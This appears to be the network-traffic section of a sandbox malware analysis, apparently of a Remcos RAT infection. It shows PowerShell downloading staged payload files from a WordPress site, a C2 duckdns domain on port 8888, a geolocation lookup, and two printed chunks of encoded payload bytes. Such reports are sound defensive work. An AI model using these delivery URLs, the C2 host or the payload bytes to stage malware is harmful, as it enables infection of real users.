                                  Sep 26, 2024 10:55:39.037964106 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.037983894 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.038003922 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.038032055 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.038032055 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.038655043 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.038681984 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.038718939 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.038731098 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.038835049 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.039242029 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.039262056 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.039290905 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.039303064 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.039330006 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.040036917 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.040067911 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.040096045 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.040107012 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.040138960 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.040741920 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.040765047 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.040817976 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.040829897 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.040857077 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.046821117 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.046855927 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.046983957 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.046983957 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.046998978 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.126514912 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.126574039 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.126616001 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.126650095 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.126678944 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.127079010 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.127135038 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.127161026 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.127186060 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.127207041 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.127234936 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.127253056 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.127727985 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.127788067 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.127800941 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.127815008 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.127861023 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.128177881 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.128226995 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.128253937 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.128266096 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.128309011 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.129019976 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.129057884 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.129091024 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.129103899 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.129129887 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.129817009 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.129864931 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.129900932 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.129913092 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.129957914 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.130603075 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.130641937 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.130687952 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.130701065 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.130744934 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.135885000 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.135936975 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.135983944 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.135997057 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.136043072 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.186161041 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.209646940 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.209702969 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.209755898 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.209770918 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.209803104 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.209822893 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.210241079 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.210284948 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.210323095 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.210334063 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.210362911 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.210398912 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.210671902 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.210719109 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.210756063 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.210767031 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.210813999 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.210839033 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.211308002 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.211361885 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.211400032 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.211410999 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.211443901 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.211463928 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.211886883 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.211929083 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.211975098 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.212002039 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.212030888 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.212095022 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.212446928 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.212487936 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.212522984 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.212533951 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.212594032 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.212594986 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.212970972 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.213013887 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.213044882 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.213056087 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.213157892 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.213159084 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.219223022 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.219266891 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.219301939 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.219314098 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.219355106 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.219398975 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.296195030 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.296253920 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.296304941 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.296334982 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.296405077 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.296515942 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.296910048 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.296955109 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.296992064 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.297008991 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.297039032 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.297079086 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.297085047 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.297110081 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.297152996 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.297158003 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.297194004 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.297205925 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.297250032 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.297302008 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.297514915 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.297602892 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.297616005 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.297775984 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.298080921 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.298161983 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.298304081 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:40.335937977 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:55:40.337646008 CEST497338888192.168.2.4173.208.241.155
                                  Sep 26, 2024 10:55:40.342792034 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:56:10.361915112 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:56:10.363615990 CEST497338888192.168.2.4173.208.241.155
                                  Sep 26, 2024 10:56:10.370065928 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:56:40.403588057 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:56:40.430078030 CEST497338888192.168.2.4173.208.241.155
                                  Sep 26, 2024 10:56:40.435070038 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:57:04.630680084 CEST4973480192.168.2.4178.237.33.50
                                  Sep 26, 2024 10:57:04.951988935 CEST4973480192.168.2.4178.237.33.50
                                  Sep 26, 2024 10:57:05.639532089 CEST4973480192.168.2.4178.237.33.50
                                  Sep 26, 2024 10:57:06.951997042 CEST4973480192.168.2.4178.237.33.50
                                  Sep 26, 2024 10:57:09.451957941 CEST4973480192.168.2.4178.237.33.50
                                  Sep 26, 2024 10:57:10.420088053 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:57:10.447021008 CEST497338888192.168.2.4173.208.241.155
                                  Sep 26, 2024 10:57:10.451865911 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:57:14.451968908 CEST4973480192.168.2.4178.237.33.50
                                  Sep 26, 2024 10:57:24.139492035 CEST4973480192.168.2.4178.237.33.50
                                  Sep 26, 2024 10:57:40.448890924 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:57:40.449947119 CEST497338888192.168.2.4173.208.241.155
                                  Sep 26, 2024 10:57:40.455337048 CEST888849733173.208.241.155192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 26, 2024 10:55:08.666109085 CEST | 64399 | 53 | 192.168.2.4 | 1.1.1.1
Sep 26, 2024 10:55:08.983028889 CEST | 53 | 64399 | 1.1.1.1 | 192.168.2.4
Sep 26, 2024 10:55:11.990962029 CEST | 50062 | 53 | 192.168.2.4 | 1.1.1.1
Sep 26, 2024 10:55:12.985208988 CEST | 50062 | 53 | 192.168.2.4 | 1.1.1.1
Sep 26, 2024 10:55:13.611675978 CEST | 53 | 50062 | 1.1.1.1 | 192.168.2.4
Sep 26, 2024 10:55:13.611826897 CEST | 53 | 50062 | 1.1.1.1 | 192.168.2.4
Sep 26, 2024 10:55:14.633678913 CEST | 63435 | 53 | 192.168.2.4 | 1.1.1.1
Sep 26, 2024 10:55:14.640899897 CEST | 53 | 63435 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 26, 2024 10:55:08.666109085 CEST | 192.168.2.4 | 1.1.1.1 | 0xdd0d | Standard query (0) | www.informacionoportuna.com | A (IP address) | IN (0x0001) | false
Sep 26, 2024 10:55:11.990962029 CEST | 192.168.2.4 | 1.1.1.1 | 0xbfa0 | Standard query (0) | comandoespecial2023.duckdns.org | A (IP address) | IN (0x0001) | false
Sep 26, 2024 10:55:12.985208988 CEST | 192.168.2.4 | 1.1.1.1 | 0xbfa0 | Standard query (0) | comandoespecial2023.duckdns.org | A (IP address) | IN (0x0001) | false
Sep 26, 2024 10:55:14.633678913 CEST | 192.168.2.4 | 1.1.1.1 | 0xf89b | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 26, 2024 10:55:08.983028889 CEST | 1.1.1.1 | 192.168.2.4 | 0xdd0d | No error (0) | www.informacionoportuna.com | informacionoportuna.com | - | CNAME (Canonical name) | IN (0x0001) | false
Sep 26, 2024 10:55:08.983028889 CEST | 1.1.1.1 | 192.168.2.4 | 0xdd0d | No error (0) | informacionoportuna.com | - | 15.235.85.194 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 10:55:13.611675978 CEST | 1.1.1.1 | 192.168.2.4 | 0xbfa0 | No error (0) | comandoespecial2023.duckdns.org | - | 173.208.241.155 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 10:55:13.611826897 CEST | 1.1.1.1 | 192.168.2.4 | 0xbfa0 | No error (0) | comandoespecial2023.duckdns.org | - | 173.208.241.155 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 10:55:14.640899897 CEST | 1.1.1.1 | 192.168.2.4 | 0xf89b | No error (0) | geoplugin.net | - | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                  • www.informacionoportuna.com
                                  • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49734 | 178.237.33.50 | 80 | 2124 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Sep 26, 2024 10:55:14.649272919 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Sep 26, 2024 10:55:15.283359051 CEST | 1170 | IN | HTTP/1.1 200 OK
date: Thu, 26 Sep 2024 08:55:15 GMT
server: Apache
content-length: 962
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
                                  Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 15.235.85.194 | 443 | 6916 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-26 08:55:09 UTC | 117 | OUT | GET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1
Host: www.informacionoportuna.com
Connection: Keep-Alive
2024-09-26 08:55:09 UTC | 211 | IN | HTTP/1.1 200 OK
Connection: close
content-type: text/plain
last-modified: Mon, 16 Sep 2024 03:18:42 GMT
accept-ranges: bytes
content-length: 11608
date: Thu, 26 Sep 2024 08:55:09 GMT
server: LiteSpeed
2024-09-26 08:55:09 UTC | 1157 | IN | Data Raw / Data Ascii: (payload dump omitted)
2024-09-26 08:55:09 UTC | 10451 | IN | Data Raw / Data Ascii: (payload dump omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 15.235.85.194 | 443 | 6916 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-26 08:55:10 UTC | 89 | OUT | GET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1
Host: www.informacionoportuna.com
2024-09-26 08:55:10 UTC | 211 | IN | HTTP/1.1 200 OK
Connection: close
content-type: text/plain
last-modified: Mon, 16 Sep 2024 02:52:42 GMT
accept-ranges: bytes
content-length: 57008
date: Thu, 26 Sep 2024 08:55:10 GMT
server: LiteSpeed
2024-09-26 08:55:10 UTC | 1157 | IN | Data Raw / Data Ascii: (payload dump omitted)
2024-09-26 08:55:10 UTC | 14994 | IN | Data Raw / Data Ascii: (payload dump omitted)
2024-09-26 08:55:10 UTC | 16384 | IN | Data Raw / Data Ascii: (payload dump omitted)
2024-09-26 08:55:10 UTC | 16384 | IN | Data Raw / Data Ascii: (payload dump omitted)
2024-09-26 08:55:10 UTC | 8089 | IN | Data Raw / Data Ascii: (payload dump omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 15.235.85.194 | 443 | 6916 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-26 08:55:11 UTC | 90 | OUT | GET /wp-content/uploads/2024/07/remcos.txt HTTP/1.1
Host: www.informacionoportuna.com
2024-09-26 08:55:11 UTC | 212 | IN | HTTP/1.1 200 OK
Connection: close
content-type: text/plain
last-modified: Tue, 02 Jul 2024 14:55:59 GMT
accept-ranges: bytes
content-length: 659456
date: Thu, 26 Sep 2024 08:55:10 GMT
server: LiteSpeed
2024-09-26 08:55:11 UTC | 16384 | IN | Data Raw / Data Ascii: (payload dump omitted)
2024-09-26 08:55:11 UTC | 16384 | IN | Data Raw / Data Ascii: (payload dump omitted)
2024-09-26 08:55:11 UTC | 16384 | IN | Data Raw / Data Ascii: (payload dump omitted)
2024-09-26 08:55:11 UTC | 16384 | IN | Data Raw / Data Ascii: (payload dump omitted)
2024-09-26 08:55:11 UTC | 16384 | IN | Data Raw / Data Ascii: (payload dump omitted)
2024-09-26 08:55:11 UTC | 16384 | IN | Data Raw / Data Ascii: (payload dump omitted)
2024-09-26 08:55:11 UTC | 16384 | IN | Data Raw / Data Ascii: (payload dump omitted)
2024-09-26 08:55:11 UTC | 16384 | IN | Data Raw / Data Ascii: (payload dump omitted)
2024-09-26 08:55:11 UTC | 16384 | IN | Data Raw / Data Ascii: (payload dump omitted)
2024-09-26 08:55:11 UTC | 16384 | IN | Data Raw / Data Ascii: (payload dump omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49741 | 15.235.85.194 | 443 | 7924 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-26 08:55:29 UTC | 117 | OUT | GET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1
Host: www.informacionoportuna.com
Connection: Keep-Alive
2024-09-26 08:55:29 UTC | 211 | IN | HTTP/1.1 200 OK
Connection: close
content-type: text/plain
last-modified: Mon, 16 Sep 2024 03:18:42 GMT
accept-ranges: bytes
content-length: 11608
date: Thu, 26 Sep 2024 08:55:29 GMT
server: LiteSpeed
2024-09-26 08:55:29 UTC | 1157 | IN | Data Raw / Data Ascii: (payload dump omitted)
2024-09-26 08:55:29 UTC | 10451 | IN | Data Raw / Data Ascii: (payload dump omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49742 | 15.235.85.194 | 443 | 7924 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-26 08:55:29 UTC | 89 | OUT | GET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1
Host: www.informacionoportuna.com
2024-09-26 08:55:30 UTC | 211 | IN | HTTP/1.1 200 OK
Connection: close
content-type: text/plain
last-modified: Mon, 16 Sep 2024 02:52:42 GMT
accept-ranges: bytes
content-length: 57008
date: Thu, 26 Sep 2024 08:55:29 GMT
server: LiteSpeed
2024-09-26 08:55:30 UTC | 1157 | IN | Data Raw / Data Ascii: (payload dump omitted)
2024-09-26 08:55:30 UTC | 14994 | IN | Data Raw / Data Ascii: (payload dump omitted)
2024-09-26 08:55:30 UTC | 16384 | IN | Data Raw / Data Ascii: (payload dump omitted)
2024-09-26 08:55:30 UTC | 16384 | IN | Data Raw / Data Ascii: (payload dump omitted)
2024-09-26 08:55:30 UTC | 8089 | IN | Data Raw / Data Ascii: (payload dump omitted)


                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                  5           192.168.2.4  49743        15.235.85.194   443               7924  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp                Bytes transferred  Direction  Data
                                  2024-09-26 08:55:30 UTC  90                 OUT        GET /wp-content/uploads/2024/07/remcos.txt HTTP/1.1
                                                                                         Host: www.informacionoportuna.com
                                  2024-09-26 08:55:30 UTC  212                IN         HTTP/1.1 200 OK
                                                                                         Connection: close
                                                                                         content-type: text/plain
                                                                                         last-modified: Tue, 02 Jul 2024 14:55:59 GMT
                                                                                         accept-ranges: bytes
                                                                                         content-length: 659456
                                                                                         date: Thu, 26 Sep 2024 08:55:30 GMT
                                                                                         server: LiteSpeed
                                  2024-09-26 08:55:30 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42
                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHAB
                                  2024-09-26 08:55:30 UTC16384INData Raw: 41 45 41 41 41 41 41 41 37 4d 2b 4f 46 76 44 6c 37 6b 78 4f 48 6f 44 2b 35 6f 58 4f 64 6c 44 55 35 45 55 4f 64 6b 7a 46 34 63 4f 4f 4d 6a 6a 72 34 51 4b 4f 64 68 54 51 34 63 7a 4e 4e 66 6a 76 33 6b 37 4e 30 65 7a 62 33 6f 32 4e 58 59 6a 31 32 38 72 4e 2b 5a 44 63 32 6f 57 4e 63 58 6a 61 31 55 57 4e 57 52 7a 31 30 73 4c 4e 56 53 44 6b 30 6f 77 4d 77 4e 54 56 7a 41 31 4d 35 4d 54 4b 79 34 75 4d 53 4c 54 7a 79 49 72 4d 67 4b 7a 6a 79 67 6f 4d 36 4a 54 63 79 59 6d 4d 63 4a 54 55 79 63 6b 4d 34 49 54 4a 78 51 66 4d 49 48 7a 76 78 6b 61 4d 49 47 44 64 78 55 56 4d 47 46 44 4c 78 51 41 4d 78 44 54 32 77 6f 4b 4d 6b 43 7a 4e 41 41 41 41 67 43 41 41 77 44 41 41 41 38 7a 2f 2f 41 2f 50 6d 2f 44 31 2f 77 38 50 34 2b 6a 6a 2f 6b 34 50 6e 39 44 58 2f 45 30 50 37 38 6a
                                  Data Ascii: AEAAAAAA7M+OFvDl7kxOHoD+5oXOdlDU5EUOdkzF4cOOMjjr4QKOdhTQ4czNNfjv3k7N0ezb3o2NXYj128rN+ZDc2oWNcXja1UWNWRz10sLNVSDk0owMwNTVzA1M5MTKy4uMSLTzyIrMgKzjygoM6JTcyYmMcJTUyckM4ITJxQfMIHzvxkaMIGDdxUVMGFDLxQAMxDT2woKMkCzNAAAAgCAAwDAAA8z//A/Pm/D1/w8P4+jj/k4Pn9DX/E0P78j
